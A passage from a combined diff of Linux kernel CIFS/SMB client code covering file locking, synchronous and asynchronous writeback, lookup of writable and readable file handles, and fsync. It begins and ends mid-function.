++	cifs_dbg(FYI, "%s: %pD2 cmd=0x%x type=0x%x flags=0x%x r=%lld:%lld\n", __func__, file, cmd,
++		 flock->fl_flags, flock->fl_type, (long long)flock->fl_start,
++		 (long long)flock->fl_end);
++
++	cfile = (struct cifsFileInfo *)file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	cifs_read_flock(flock, &type, &lock, &unlock, &wait_flag,
++			tcon->ses->server);
++	cifs_sb = CIFS_FILE_SB(file);
++	set_bit(CIFS_INO_CLOSE_ON_LOCK, &CIFS_I(d_inode(cfile->dentry))->flags);
++
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		posix_lck = true;
++	/*
++	 * BB add code here to normalize offset and length to account for
++	 * negative length which we can not accept over the wire.
++	 */
++	if (IS_GETLK(cmd)) {
++		rc = cifs_getlk(file, flock, type, wait_flag, posix_lck, xid);
++		free_xid(xid);
++		return rc;
++	}
++
++	if (!lock && !unlock) {
++		/*
++		 * if no lock or unlock then nothing to do since we do not
++		 * know what it is
++		 */
++		free_xid(xid);
++		return -EOPNOTSUPP;
++	}
++
++	rc = cifs_setlk(file, flock, type, wait_flag, posix_lck, lock, unlock,
++			xid);
++	free_xid(xid);
++	return rc;
++}
++
++/*
++ * update the file size (if needed) after a write. Should be called with
++ * the inode->i_lock held
++ */
++void
++cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
++		      unsigned int bytes_written)
++{
++	loff_t end_of_write = offset + bytes_written;
++
++	if (end_of_write > cifsi->server_eof)
++		cifsi->server_eof = end_of_write;
++}
++
++static ssize_t
++cifs_write(struct cifsFileInfo *open_file, __u32 pid, const char *write_data,
++	   size_t write_size, loff_t *offset)
++{
++	int rc = 0;
++	unsigned int bytes_written = 0;
++	unsigned int total_written;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	unsigned int xid;
++	struct dentry *dentry = open_file->dentry;
++	struct cifsInodeInfo *cifsi = CIFS_I(d_inode(dentry));
++	struct cifs_io_parms io_parms = {0};
++
++	cifs_dbg(FYI, "write %zd bytes to offset %lld of %pd\n",
++		 write_size, *offset, dentry);
++
++	tcon = tlink_tcon(open_file->tlink);
++	server = tcon->ses->server;
++
++	if (!server->ops->sync_write)
++		return -ENOSYS;
++
++	xid = get_xid();
++
++	for (total_written = 0; write_size > total_written;
++	     total_written += bytes_written) {
++		rc = -EAGAIN;
++		while (rc == -EAGAIN) {
++			struct kvec iov[2];
++			unsigned int len;
++
++			if (open_file->invalidHandle) {
++				/* we could deadlock if we called
++				   filemap_fdatawait from here so tell
++				   reopen_file not to flush data to
++				   server now */
++				rc = cifs_reopen_file(open_file, false);
++				if (rc != 0)
++					break;
++			}
++
++			len = min(server->ops->wp_retry_size(d_inode(dentry)),
++				  (unsigned int)write_size - total_written);
++			/* iov[0] is reserved for smb header */
++			iov[1].iov_base = (char *)write_data + total_written;
++			iov[1].iov_len = len;
++			io_parms.pid = pid;
++			io_parms.tcon = tcon;
++			io_parms.offset = *offset;
++			io_parms.length = len;
++			rc = server->ops->sync_write(xid, &open_file->fid,
++					&io_parms, &bytes_written, iov, 1);
++		}
++		if (rc || (bytes_written == 0)) {
++			if (total_written)
++				break;
++			else {
++				free_xid(xid);
++				return rc;
++			}
++		} else {
++			spin_lock(&d_inode(dentry)->i_lock);
++			cifs_update_eof(cifsi, *offset, bytes_written);
++			spin_unlock(&d_inode(dentry)->i_lock);
++			*offset += bytes_written;
++		}
++	}
++
++	cifs_stats_bytes_written(tcon, total_written);
++
++	if (total_written > 0) {
++		spin_lock(&d_inode(dentry)->i_lock);
++		if (*offset > d_inode(dentry)->i_size) {
++			i_size_write(d_inode(dentry), *offset);
++			d_inode(dentry)->i_blocks = (512 - 1 + *offset) >> 9;
++		}
++		spin_unlock(&d_inode(dentry)->i_lock);
++	}
++	mark_inode_dirty_sync(d_inode(dentry));
++	free_xid(xid);
++	return total_written;
++}
++
++struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *cifs_inode,
++					bool fsuid_only)
++{
++	struct cifsFileInfo *open_file = NULL;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
++
++	/* only filter by fsuid on multiuser mounts */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
++		fsuid_only = false;
++
++	spin_lock(&cifs_inode->open_file_lock);
++	/* we could simply get the first_list_entry since write-only entries
++	   are always at the end of the list but since the first entry might
++	   have a close pending, we go through the whole list */
++	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
++		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
++			continue;
++		if (OPEN_FMODE(open_file->f_flags) & FMODE_READ) {
++			if ((!open_file->invalidHandle)) {
++				/* found a good file */
++				/* lock it so it will not be closed on us */
++				cifsFileInfo_get(open_file);
++				spin_unlock(&cifs_inode->open_file_lock);
++				return open_file;
++			} /* else might as well continue, and look for
++			     another, or simply have the caller reopen it
++			     again rather than trying to fix this handle */
++		} else /* write only file */
++			break; /* write only files are last so must be done */
++	}
++	spin_unlock(&cifs_inode->open_file_lock);
++	return NULL;
++}
++
++/* Return -EBADF if no handle is found and general rc otherwise */
++int
++cifs_get_writable_file(struct cifsInodeInfo *cifs_inode, int flags,
++		       struct cifsFileInfo **ret_file)
++{
++	struct cifsFileInfo *open_file, *inv_file = NULL;
++	struct cifs_sb_info *cifs_sb;
++	bool any_available = false;
++	int rc = -EBADF;
++	unsigned int refind = 0;
++	bool fsuid_only = flags & FIND_WR_FSUID_ONLY;
++	bool with_delete = flags & FIND_WR_WITH_DELETE;
++	*ret_file = NULL;
++
++	/*
++	 * Having a null inode here (because mapping->host was set to zero by
++	 * the VFS or MM) should not happen but we had reports of on oops (due
++	 * to it being zero) during stress testcases so we need to check for it
++	 */
++
++	if (cifs_inode == NULL) {
++		cifs_dbg(VFS, "Null inode passed to cifs_writeable_file\n");
++		dump_stack();
++		return rc;
++	}
++
++	cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
++
++	/* only filter by fsuid on multiuser mounts */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
++		fsuid_only = false;
++
++	spin_lock(&cifs_inode->open_file_lock);
++refind_writable:
++	if (refind > MAX_REOPEN_ATT) {
++		spin_unlock(&cifs_inode->open_file_lock);
++		return rc;
++	}
++	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
++		if (!any_available && open_file->pid != current->tgid)
++			continue;
++		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
++			continue;
++		if (with_delete && !(open_file->fid.access & DELETE))
++			continue;
++		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
++			if (!open_file->invalidHandle) {
++				/* found a good writable file */
++				cifsFileInfo_get(open_file);
++				spin_unlock(&cifs_inode->open_file_lock);
++				*ret_file = open_file;
++				return 0;
++			} else {
++				if (!inv_file)
++					inv_file = open_file;
++			}
++		}
++	}
++	/* couldn't find useable FH with same pid, try any available */
++	if (!any_available) {
++		any_available = true;
++		goto refind_writable;
++	}
++
++	if (inv_file) {
++		any_available = false;
++		cifsFileInfo_get(inv_file);
++	}
++
++	spin_unlock(&cifs_inode->open_file_lock);
++
++	if (inv_file) {
++		rc = cifs_reopen_file(inv_file, false);
++		if (!rc) {
++			*ret_file = inv_file;
++			return 0;
++		}
++
++		spin_lock(&cifs_inode->open_file_lock);
++		list_move_tail(&inv_file->flist, &cifs_inode->openFileList);
++		spin_unlock(&cifs_inode->open_file_lock);
++		cifsFileInfo_put(inv_file);
++		++refind;
++		inv_file = NULL;
++		spin_lock(&cifs_inode->open_file_lock);
++		goto refind_writable;
++	}
++
++	return rc;
++}
++
++struct cifsFileInfo *
++find_writable_file(struct cifsInodeInfo *cifs_inode, int flags)
++{
++	struct cifsFileInfo *cfile;
++	int rc;
++
++	rc = cifs_get_writable_file(cifs_inode, flags, &cfile);
++	if (rc)
++		cifs_dbg(FYI, "Couldn't find writable handle rc=%d\n", rc);
++
++	return cfile;
++}
++
++int
++cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
++		       int flags,
++		       struct cifsFileInfo **ret_file)
++{
++	struct cifsFileInfo *cfile;
++	void *page = alloc_dentry_path();
++
++	*ret_file = NULL;
++
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		struct cifsInodeInfo *cinode;
++		const char *full_path = build_path_from_dentry(cfile->dentry, page);
++		if (IS_ERR(full_path)) {
++			spin_unlock(&tcon->open_file_lock);
++			free_dentry_path(page);
++			return PTR_ERR(full_path);
++		}
++		if (strcmp(full_path, name))
++			continue;
++
++		cinode = CIFS_I(d_inode(cfile->dentry));
++		spin_unlock(&tcon->open_file_lock);
++		free_dentry_path(page);
++		return cifs_get_writable_file(cinode, flags, ret_file);
++	}
++
++	spin_unlock(&tcon->open_file_lock);
++	free_dentry_path(page);
++	return -ENOENT;
++}
++
++int
++cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
++		       struct cifsFileInfo **ret_file)
++{
++	struct cifsFileInfo *cfile;
++	void *page = alloc_dentry_path();
++
++	*ret_file = NULL;
++
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		struct cifsInodeInfo *cinode;
++		const char *full_path = build_path_from_dentry(cfile->dentry, page);
++		if (IS_ERR(full_path)) {
++			spin_unlock(&tcon->open_file_lock);
++			free_dentry_path(page);
++			return PTR_ERR(full_path);
++		}
++		if (strcmp(full_path, name))
++			continue;
++
++		cinode = CIFS_I(d_inode(cfile->dentry));
++		spin_unlock(&tcon->open_file_lock);
++		free_dentry_path(page);
++		*ret_file = find_readable_file(cinode, 0);
++		return *ret_file ? 0 : -ENOENT;
++	}
++
++	spin_unlock(&tcon->open_file_lock);
++	free_dentry_path(page);
++	return -ENOENT;
++}
++
++void
++cifs_writedata_release(struct kref *refcount)
++{
++	struct cifs_writedata *wdata = container_of(refcount,
++					struct cifs_writedata, refcount);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (wdata->mr) {
++		smbd_deregister_mr(wdata->mr);
++		wdata->mr = NULL;
++	}
++#endif
++
++	if (wdata->cfile)
++		cifsFileInfo_put(wdata->cfile);
++
++	kvfree(wdata->pages);
++	kfree(wdata);
++}
++
++/*
++ * Write failed with a retryable error. Resend the write request. It's also
++ * possible that the page was redirtied so re-clean the page.
++ */
++static void
++cifs_writev_requeue(struct cifs_writedata *wdata)
++{
++	int i, rc = 0;
++	struct inode *inode = d_inode(wdata->cfile->dentry);
++	struct TCP_Server_Info *server;
++	unsigned int rest_len;
++
++	server = tlink_tcon(wdata->cfile->tlink)->ses->server;
++	i = 0;
++	rest_len = wdata->bytes;
++	do {
++		struct cifs_writedata *wdata2;
++		unsigned int j, nr_pages, wsize, tailsz, cur_len;
++
++		wsize = server->ops->wp_retry_size(inode);
++		if (wsize < rest_len) {
++			nr_pages = wsize / PAGE_SIZE;
++			if (!nr_pages) {
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			cur_len = nr_pages * PAGE_SIZE;
++			tailsz = PAGE_SIZE;
++		} else {
++			nr_pages = DIV_ROUND_UP(rest_len, PAGE_SIZE);
++			cur_len = rest_len;
++			tailsz = rest_len - (nr_pages - 1) * PAGE_SIZE;
++		}
++
++		wdata2 = cifs_writedata_alloc(nr_pages, cifs_writev_complete);
++		if (!wdata2) {
++			rc = -ENOMEM;
++			break;
++		}
++
++		for (j = 0; j < nr_pages; j++) {
++			wdata2->pages[j] = wdata->pages[i + j];
++			lock_page(wdata2->pages[j]);
++			clear_page_dirty_for_io(wdata2->pages[j]);
++		}
++
++		wdata2->sync_mode = wdata->sync_mode;
++		wdata2->nr_pages = nr_pages;
++		wdata2->offset = page_offset(wdata2->pages[0]);
++		wdata2->pagesz = PAGE_SIZE;
++		wdata2->tailsz = tailsz;
++		wdata2->bytes = cur_len;
++
++		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY,
++					    &wdata2->cfile);
++		if (!wdata2->cfile) {
++			cifs_dbg(VFS, "No writable handle to retry writepages rc=%d\n",
++				 rc);
++			if (!is_retryable_error(rc))
++				rc = -EBADF;
++		} else {
++			wdata2->pid = wdata2->cfile->pid;
++			rc = server->ops->async_writev(wdata2,
++						       cifs_writedata_release);
++		}
++
++		for (j = 0; j < nr_pages; j++) {
++			unlock_page(wdata2->pages[j]);
++			if (rc != 0 && !is_retryable_error(rc)) {
++				SetPageError(wdata2->pages[j]);
++				end_page_writeback(wdata2->pages[j]);
++				put_page(wdata2->pages[j]);
++			}
++		}
++
++		kref_put(&wdata2->refcount, cifs_writedata_release);
++		if (rc) {
++			if (is_retryable_error(rc))
++				continue;
++			i += nr_pages;
++			break;
++		}
++
++		rest_len -= cur_len;
++		i += nr_pages;
++	} while (i < wdata->nr_pages);
++
++	/* cleanup remaining pages from the original wdata */
++	for (; i < wdata->nr_pages; i++) {
++		SetPageError(wdata->pages[i]);
++		end_page_writeback(wdata->pages[i]);
++		put_page(wdata->pages[i]);
++	}
++
++	if (rc != 0 && !is_retryable_error(rc))
++		mapping_set_error(inode->i_mapping, rc);
++	kref_put(&wdata->refcount, cifs_writedata_release);
++}
++
++void
++cifs_writev_complete(struct work_struct *work)
++{
++	struct cifs_writedata *wdata = container_of(work,
++						struct cifs_writedata, work);
++	struct inode *inode = d_inode(wdata->cfile->dentry);
++	int i = 0;
++
++	if (wdata->result == 0) {
++		spin_lock(&inode->i_lock);
++		cifs_update_eof(CIFS_I(inode), wdata->offset, wdata->bytes);
++		spin_unlock(&inode->i_lock);
++		cifs_stats_bytes_written(tlink_tcon(wdata->cfile->tlink),
++					 wdata->bytes);
++	} else if (wdata->sync_mode == WB_SYNC_ALL && wdata->result == -EAGAIN)
++		return cifs_writev_requeue(wdata);
++
++	for (i = 0; i < wdata->nr_pages; i++) {
++		struct page *page = wdata->pages[i];
++
++		if (wdata->result == -EAGAIN)
++			__set_page_dirty_nobuffers(page);
++		else if (wdata->result < 0)
++			SetPageError(page);
++		end_page_writeback(page);
++		cifs_readpage_to_fscache(inode, page);
++		put_page(page);
++	}
++	if (wdata->result != -EAGAIN)
++		mapping_set_error(inode->i_mapping, wdata->result);
++	kref_put(&wdata->refcount, cifs_writedata_release);
++}
++
++struct cifs_writedata *
++cifs_writedata_alloc(unsigned int nr_pages, work_func_t complete)
++{
++	struct cifs_writedata *writedata = NULL;
++	struct page **pages =
++		kcalloc(nr_pages, sizeof(struct page *), GFP_NOFS);
++	if (pages) {
++		writedata = cifs_writedata_direct_alloc(pages, complete);
++		if (!writedata)
++			kvfree(pages);
++	}
++
++	return writedata;
++}
++
++struct cifs_writedata *
++cifs_writedata_direct_alloc(struct page **pages, work_func_t complete)
++{
++	struct cifs_writedata *wdata;
++
++	wdata = kzalloc(sizeof(*wdata), GFP_NOFS);
++	if (wdata != NULL) {
++		wdata->pages = pages;
++		kref_init(&wdata->refcount);
++		INIT_LIST_HEAD(&wdata->list);
++		init_completion(&wdata->done);
++		INIT_WORK(&wdata->work, complete);
++	}
++	return wdata;
++}
++
++
++static int cifs_partialpagewrite(struct page *page, unsigned from, unsigned to)
++{
++	struct address_space *mapping = page->mapping;
++	loff_t offset = (loff_t)page->index << PAGE_SHIFT;
++	char *write_data;
++	int rc = -EFAULT;
++	int bytes_written = 0;
++	struct inode *inode;
++	struct cifsFileInfo *open_file;
++
++	if (!mapping || !mapping->host)
++		return -EFAULT;
++
++	inode = page->mapping->host;
++
++	offset += (loff_t)from;
++	write_data = kmap(page);
++	write_data += from;
++
++	if ((to > PAGE_SIZE) || (from > to)) {
++		kunmap(page);
++		return -EIO;
++	}
++
++	/* racing with truncate? */
++	if (offset > mapping->host->i_size) {
++		kunmap(page);
++		return 0; /* don't care */
++	}
++
++	/* check to make sure that we are not extending the file */
++	if (mapping->host->i_size - offset < (loff_t)to)
++		to = (unsigned)(mapping->host->i_size - offset);
++
++	rc = cifs_get_writable_file(CIFS_I(mapping->host), FIND_WR_ANY,
++				    &open_file);
++	if (!rc) {
++		bytes_written = cifs_write(open_file, open_file->pid,
++					   write_data, to - from, &offset);
++		cifsFileInfo_put(open_file);
++		/* Does mm or vfs already set times? */
++		inode->i_atime = inode->i_mtime = current_time(inode);
++		if ((bytes_written > 0) && (offset))
++			rc = 0;
++		else if (bytes_written < 0)
++			rc = bytes_written;
++		else
++			rc = -EFAULT;
++	} else {
++		cifs_dbg(FYI, "No writable handle for write page rc=%d\n", rc);
++		if (!is_retryable_error(rc))
++			rc = -EIO;
++	}
++
++	kunmap(page);
++	return rc;
++}
++
++static struct cifs_writedata *
++wdata_alloc_and_fillpages(pgoff_t tofind, struct address_space *mapping,
++			  pgoff_t end, pgoff_t *index,
++			  unsigned int *found_pages)
++{
++	struct cifs_writedata *wdata;
++
++	wdata = cifs_writedata_alloc((unsigned int)tofind,
++				     cifs_writev_complete);
++	if (!wdata)
++		return NULL;
++
++	*found_pages = find_get_pages_range_tag(mapping, index, end,
++				PAGECACHE_TAG_DIRTY, tofind, wdata->pages);
++	return wdata;
++}
++
++static unsigned int
++wdata_prepare_pages(struct cifs_writedata *wdata, unsigned int found_pages,
++		    struct address_space *mapping,
++		    struct writeback_control *wbc,
++		    pgoff_t end, pgoff_t *index, pgoff_t *next, bool *done)
++{
++	unsigned int nr_pages = 0, i;
++	struct page *page;
++
++	for (i = 0; i < found_pages; i++) {
++		page = wdata->pages[i];
++		/*
++		 * At this point we hold neither the i_pages lock nor the
++		 * page lock: the page may be truncated or invalidated
++		 * (changing page->mapping to NULL), or even swizzled
++		 * back from swapper_space to tmpfs file mapping
++		 */
++
++		if (nr_pages == 0)
++			lock_page(page);
++		else if (!trylock_page(page))
++			break;
++
++		if (unlikely(page->mapping != mapping)) {
++			unlock_page(page);
++			break;
++		}
++
++		if (!wbc->range_cyclic && page->index > end) {
++			*done = true;
++			unlock_page(page);
++			break;
++		}
++
++		if (*next && (page->index != *next)) {
++			/* Not next consecutive page */
++			unlock_page(page);
++			break;
++		}
++
++		if (wbc->sync_mode != WB_SYNC_NONE)
++			wait_on_page_writeback(page);
++
++		if (PageWriteback(page) ||
++				!clear_page_dirty_for_io(page)) {
++			unlock_page(page);
++			break;
++		}
++
++		/*
++		 * This actually clears the dirty bit in the radix tree.
++		 * See cifs_writepage() for more commentary.
++		 */
++		set_page_writeback(page);
++		if (page_offset(page) >= i_size_read(mapping->host)) {
++			*done = true;
++			unlock_page(page);
++			end_page_writeback(page);
++			break;
++		}
++
++		wdata->pages[i] = page;
++		*next = page->index + 1;
++		++nr_pages;
++	}
++
++	/* reset index to refind any pages skipped */
++	if (nr_pages == 0)
++		*index = wdata->pages[0]->index + 1;
++
++	/* put any pages we aren't going to use */
++	for (i = nr_pages; i < found_pages; i++) {
++		put_page(wdata->pages[i]);
++		wdata->pages[i] = NULL;
++	}
++
++	return nr_pages;
++}
++
++static int
++wdata_send_pages(struct cifs_writedata *wdata, unsigned int nr_pages,
++		 struct address_space *mapping, struct writeback_control *wbc)
++{
++	int rc;
++
++	wdata->sync_mode = wbc->sync_mode;
++	wdata->nr_pages = nr_pages;
++	wdata->offset = page_offset(wdata->pages[0]);
++	wdata->pagesz = PAGE_SIZE;
++	wdata->tailsz = min(i_size_read(mapping->host) -
++			page_offset(wdata->pages[nr_pages - 1]),
++			(loff_t)PAGE_SIZE);
++	wdata->bytes = ((nr_pages - 1) * PAGE_SIZE) + wdata->tailsz;
++	wdata->pid = wdata->cfile->pid;
++
++	rc = adjust_credits(wdata->server, &wdata->credits, wdata->bytes);
++	if (rc)
++		return rc;
++
++	if (wdata->cfile->invalidHandle)
++		rc = -EAGAIN;
++	else
++		rc = wdata->server->ops->async_writev(wdata,
++						      cifs_writedata_release);
++
++	return rc;
++}
++
++static int cifs_writepages(struct address_space *mapping,
++			   struct writeback_control *wbc)
++{
++	struct inode *inode = mapping->host;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct TCP_Server_Info *server;
++	bool done = false, scanned = false, range_whole = false;
++	pgoff_t end, index;
++	struct cifs_writedata *wdata;
++	struct cifsFileInfo *cfile = NULL;
++	int rc = 0;
++	int saved_rc = 0;
++	unsigned int xid;
++
++	/*
++	 * If wsize is smaller than the page cache size, default to writing
++	 * one page at a time via cifs_writepage
++	 */
++	if (cifs_sb->ctx->wsize < PAGE_SIZE)
++		return generic_writepages(mapping, wbc);
++
++	xid = get_xid();
++	if (wbc->range_cyclic) {
++		index = mapping->writeback_index; /* Start from prev offset */
++		end = -1;
++	} else {
++		index = wbc->range_start >> PAGE_SHIFT;
++		end = wbc->range_end >> PAGE_SHIFT;
++		if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
++			range_whole = true;
++		scanned = true;
++	}
++	server = cifs_pick_channel(cifs_sb_master_tcon(cifs_sb)->ses);
++
++retry:
++	while (!done && index <= end) {
++		unsigned int i, nr_pages, found_pages, wsize;
++		pgoff_t next = 0, tofind, saved_index = index;
++		struct cifs_credits credits_on_stack;
++		struct cifs_credits *credits = &credits_on_stack;
++		int get_file_rc = 0;
++
++		if (cfile)
++			cifsFileInfo_put(cfile);
++
++		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY, &cfile);
++
++		/* in case of an error store it to return later */
++		if (rc)
++			get_file_rc = rc;
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
++						   &wsize, credits);
++		if (rc != 0) {
++			done = true;
++			break;
++		}
++
++		tofind = min((wsize / PAGE_SIZE) - 1, end - index) + 1;
++
++		wdata = wdata_alloc_and_fillpages(tofind, mapping, end, &index,
++						  &found_pages);
++		if (!wdata) {
++			rc = -ENOMEM;
++			done = true;
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		if (found_pages == 0) {
++			kref_put(&wdata->refcount, cifs_writedata_release);
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		nr_pages = wdata_prepare_pages(wdata, found_pages, mapping, wbc,
++					       end, &index, &next, &done);
++
++		/* nothing to write? */
++		if (nr_pages == 0) {
++			kref_put(&wdata->refcount, cifs_writedata_release);
++			add_credits_and_wake_if(server, credits, 0);
++			continue;
++		}
++
++		wdata->credits = credits_on_stack;
++		wdata->cfile = cfile;
++		wdata->server = server;
++		cfile = NULL;
++
++		if (!wdata->cfile) {
++			cifs_dbg(VFS, "No writable handle in writepages rc=%d\n",
++				 get_file_rc);
++			if (is_retryable_error(get_file_rc))
++				rc = get_file_rc;
++			else
++				rc = -EBADF;
++		} else
++			rc = wdata_send_pages(wdata, nr_pages, mapping, wbc);
++
++		for (i = 0; i < nr_pages; ++i)
++			unlock_page(wdata->pages[i]);
++
++		/* send failure -- clean up the mess */
++		if (rc != 0) {
++			add_credits_and_wake_if(server, &wdata->credits, 0);
++			for (i = 0; i < nr_pages; ++i) {
++				if (is_retryable_error(rc))
++					redirty_page_for_writepage(wbc,
++							   wdata->pages[i]);
++				else
++					SetPageError(wdata->pages[i]);
++				end_page_writeback(wdata->pages[i]);
++				put_page(wdata->pages[i]);
++			}
++			if (!is_retryable_error(rc))
++				mapping_set_error(mapping, rc);
++		}
++		kref_put(&wdata->refcount, cifs_writedata_release);
++
++		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN) {
++			index = saved_index;
++			continue;
++		}
++
++		/* Return immediately if we received a signal during writing */
++		if (is_interrupt_error(rc)) {
++			done = true;
++			break;
++		}
++
++		if (rc != 0 && saved_rc == 0)
++			saved_rc = rc;
++
++		wbc->nr_to_write -= nr_pages;
++		if (wbc->nr_to_write <= 0)
++			done = true;
++
++		index = next;
++	}
++
++	if (!scanned && !done) {
++		/*
++		 * We hit the last page and there is more work to be done: wrap
++		 * back to the start of the file
++		 */
++		scanned = true;
++		index = 0;
++		goto retry;
++	}
++
++	if (saved_rc != 0)
++		rc = saved_rc;
++
++	if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
++		mapping->writeback_index = index;
++
++	if (cfile)
++		cifsFileInfo_put(cfile);
++	free_xid(xid);
++	/* Indication to update ctime and mtime as close is deferred */
++	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
++	return rc;
++}
++
++static int
++cifs_writepage_locked(struct page *page, struct writeback_control *wbc)
++{
++	int rc;
++	unsigned int xid;
++
++	xid = get_xid();
++/* BB add check for wbc flags */
++	get_page(page);
++	if (!PageUptodate(page))
++		cifs_dbg(FYI, "ppw - page not up to date\n");
++
++	/*
++	 * Set the "writeback" flag, and clear "dirty" in the radix tree.
++	 *
++	 * A writepage() implementation always needs to do either this,
++	 * or re-dirty the page with "redirty_page_for_writepage()" in
++	 * the case of a failure.
++	 *
++	 * Just unlocking the page will cause the radix tree tag-bits
++	 * to fail to update with the state of the page correctly.
++	 */
++	set_page_writeback(page);
++retry_write:
++	rc = cifs_partialpagewrite(page, 0, PAGE_SIZE);
++	if (is_retryable_error(rc)) {
++		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN)
++			goto retry_write;
++		redirty_page_for_writepage(wbc, page);
++	} else if (rc != 0) {
++		SetPageError(page);
++		mapping_set_error(page->mapping, rc);
++	} else {
++		SetPageUptodate(page);
++	}
++	end_page_writeback(page);
++	put_page(page);
++	free_xid(xid);
++	return rc;
++}
++
++static int cifs_writepage(struct page *page, struct writeback_control *wbc)
++{
++	int rc = cifs_writepage_locked(page, wbc);
++	unlock_page(page);
++	return rc;
++}
++
++static int cifs_write_end(struct file *file, struct address_space *mapping,
++			loff_t pos, unsigned len, unsigned copied,
++			struct page *page, void *fsdata)
++{
++	int rc;
++	struct inode *inode = mapping->host;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
++	__u32 pid;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = cfile->pid;
++	else
++		pid = current->tgid;
++
++	cifs_dbg(FYI, "write_end for page %p from pos %lld with %d bytes\n",
++		 page, pos, copied);
++
++	if (PageChecked(page)) {
++		if (copied == len)
++			SetPageUptodate(page);
++		ClearPageChecked(page);
++	} else if (!PageUptodate(page) && copied == PAGE_SIZE)
++		SetPageUptodate(page);
++
++	if (!PageUptodate(page)) {
++		char *page_data;
++		unsigned offset = pos & (PAGE_SIZE - 1);
++		unsigned int xid;
++
++		xid = get_xid();
++		/* this is probably better than directly calling
++		   partialpage_write since in this function the file handle is
++		   known which we might as well	leverage */
++		/* BB check if anything else missing out of ppw
++		   such as updating last write time */
++		page_data = kmap(page);
++		rc = cifs_write(cfile, pid, page_data + offset, copied, &pos);
++		/* if (rc < 0) should we set writebehind rc? */
++		kunmap(page);
++
++		free_xid(xid);
++	} else {
++		rc = copied;
++		pos += copied;
++		set_page_dirty(page);
++	}
++
++	if (rc > 0) {
++		spin_lock(&inode->i_lock);
++		if (pos > inode->i_size) {
++			i_size_write(inode, pos);
++			inode->i_blocks = (512 - 1 + pos) >> 9;
++		}
++		spin_unlock(&inode->i_lock);
++	}
++
++	unlock_page(page);
++	put_page(page);
++	/* Indication to update ctime and mtime as close is deferred */
++	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
++
++	return rc;
++}
++
++int cifs_strict_fsync(struct file *file, loff_t start, loff_t end,
++		      int datasync)
++{
++	unsigned int xid;
++	int rc = 0;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsFileInfo *smbfile = file->private_data;
++	struct inode *inode = file_inode(file);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	rc = file_write_and_wait_range(file, start, end);
++	if (rc) {
++		trace_cifs_fsync_err(inode->i_ino, rc);
++		return rc;
++	}
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
++		 file, datasync);
++
++	if (!CIFS_CACHE_READ(CIFS_I(inode))) {
++		rc = cifs_zap_mapping(inode);
++		if (rc) {
++			cifs_dbg(FYI, "rc: %d during invalidate phase\n", rc);
++			rc = 0; /* don't care about it in fsync */
++		}
++	}
++
++	tcon = tlink_tcon(smbfile->tlink);
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
++		server = tcon->ses->server;
++		if (server->ops->flush == NULL) {
++			rc = -ENOSYS;
++			goto strict_fsync_exit;
++		}
++
++		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
++			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
++			if (smbfile) {
++				rc = server->ops->flush(xid, tcon, &smbfile->fid);
++				cifsFileInfo_put(smbfile);
++			} else
++				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
++		} else
++			rc = server->ops->flush(xid, tcon, &smbfile->fid);
++	}
++
++strict_fsync_exit:
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_fsync(struct file *file, loff_t start, loff_t end, int datasync)
++{
++	unsigned int xid;
++	int rc = 0;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsFileInfo *smbfile = file->private_data;
++	struct inode *inode = file_inode(file);
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++
++	rc = file_write_and_wait_range(file, start, end);
++	if (rc) {
++		trace_cifs_fsync_err(file_inode(file)->i_ino, rc);
++		return rc;
++	}
++
++	xid = get_xid();
++
